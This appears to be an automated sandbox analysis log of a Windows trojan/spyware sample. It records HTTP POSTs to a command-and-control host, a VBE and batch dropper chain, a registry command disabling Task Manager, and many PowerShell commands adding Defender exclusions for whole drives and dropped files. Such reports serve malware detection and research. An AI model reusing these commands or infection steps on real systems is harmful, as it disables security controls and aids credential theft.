                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1608Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global traffic; DNS traffic detected: DNS query: 588538cm.renyash.ru
                        Source: unknown; HTTP traffic detected:
                            POST /polldle.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                            Host: 588538cm.renyash.ru
                            Content-Length: 344
                            Expect: 100-continue
                            Connection: Keep-Alive
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWindow created: window name: CLIPBRDWNDCLASS

                        System Summary

                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00276FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00276FAA
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Windows\Panther\UnattendGC\ba5d7d16636746Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BkJolhdT.log 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: String function: 0028EC50 appears 56 times
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: String function: 0028F5F0 appears 31 times
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: String function: 0028EB78 appears 39 times
                        Source: DjKnpLXK.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: ZDjBezmV.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: PVPluWhn.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: xIogbBMY.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: mUJprpRq.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: DBQFDgRN.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: tSxpUEMf.log.8.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: BkJolhdT.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: amqbDjSR.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: REWLTGNk.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: pIbqPImn.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: YBKLwVHY.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: FpiFczmJ.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: vBEPsorb.log.50.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: OisrvsB6Ea.exe, 00000000.00000003.1673294084.00000000055AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exe, 00000000.00000003.1673294084.00000000055AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exe, 00000000.00000002.1676019140.00000000055AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs OisrvsB6Ea.exe
                        Source: OisrvsB6Ea.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@76/343@1/2
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_00276C74 GetLastError,FormatMessageW,0_2_00276C74
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCode function: 0_2_0028A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_0028A6C2
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Program Files (x86)\microsoft office\Office16\dasHost.exeJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrtJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1712:120:WilError_03
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-IlTr7bwNxEio1IRNv7Cv
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeFile created: C:\Users\user\AppData\Local\Temp\asMiv0NQX3Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: sfxname0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: sfxstime0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: STARTDLG0_2_0028DF1E
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeCommand line argument: xz,0_2_0028DF1E
                        Source: OisrvsB6Ea.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile read: C:\Windows\win.iniJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: iBP5BfRoTv.50.dr, fiQXVoqIRi.50.dr, oKObDLWzeB.50.dr, ld6hTecCzW.50.dr, 96vx87EYSZ.50.dr, h77Uk2epKz.50.dr, SfaCX3UPFW.50.dr, pul8k1pnWC.50.dr, UTUuNLGZIe.50.dr, 0pMkvRpjPR.50.dr, 1pHiMLPEzt.50.dr, GmIRbxFjNC.50.dr, 9QX5SrMSF8.50.dr, zaSSX7RXtx.50.dr, yycG0dLQ73.50.dr, NKMrI06Vrb.50.dr, MSMCtLJRhT.50.dr, VX27bY4CSL.50.dr, uznz9CYzxe.50.dr, CChzuaKY4Y.50.dr, cQH4grE6Ql.50.dr, RVl0ElJFwk.50.dr, ngRqhJWd5l.50.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: OisrvsB6Ea.exeReversingLabs: Detection: 60%
                        Source: OisrvsB6Ea.exeVirustotal: Detection: 50%
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeFile read: C:\Users\user\Desktop\OisrvsB6Ea.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\OisrvsB6Ea.exe "C:\Users\user\Desktop\OisrvsB6Ea.exe"
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\zavVQKy7Y1920izKCt5xjM9GjoXxNpPSllMDj1uh.vbe"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\XyQqwqHSpVeTNnNDm2Xa4eg.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe "C:\Users\user\AppData\Roaming\ComProviderDriversavescrt/ComrefNetsvc.exe"
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\WindowsPowerShell\Modules\sihost.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\PrintHood\SearchApp.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe "C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
